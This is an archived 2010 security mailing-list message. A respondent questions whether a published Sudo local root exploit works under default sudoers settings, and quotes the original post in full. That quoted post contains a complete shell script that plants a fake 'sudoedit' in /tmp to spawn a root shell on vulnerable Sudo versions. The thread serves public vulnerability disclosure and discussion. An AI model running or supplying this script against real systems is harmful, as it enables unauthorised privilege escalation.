| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 3 Mar 2010 12:03:32 +0000 (GMT) From: andy@...mail.com To: Kingcope <kcope2@...glemail.com> Cc: full-disclosure@...ts.grok.org.uk, <bugtraq@...urityfocus.com> Subject: Re: Todd Miller Sudo local root exploit discovered by Slouching Hi Kingcope, ....but if the 'sudoers' file is correctly configured then you would not have the appropriate sudo permission to run the 'sudoedit' as root. ....of course I'm assuming that the 'sudoers' file has not got the 'run any command' in it. If the sudoers file used is even the default then I would think you would get some error on the lines of: 'Sorry, user is not allowed to execute './sudoedit test' as root on this machine'. Aren't you assuming the the sudoers file has a line in it that allows the user in question to run the /home/myhome/sudoedit as sudo??? Or am I missing something? Andy On Tue, 2 Mar 2010, Kingcope wrote: > Just for the record. > > ---snip--- > #!/bin/sh > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 > # local root exploit > # March 2010 > # automated by kingcope > # Full Credits to Slouching > echo Tod Miller Sudo local root exploit > echo by Slouching > echo automated by kingcope > if [ $# != 1 ] > then > echo "usage: ./sudoxpl.sh <file you have permission to edit>" > exit > fi > cd /tmp > cat > sudoedit << _EOF > #!/bin/sh > echo ALEX-ALEX > su > /bin/su > /usr/bin/su > _EOF > chmod a+x ./sudoedit > sudo ./sudoedit $1 > --snip--- > > cheers, > kingcope >
Powered by blists - more mailing lists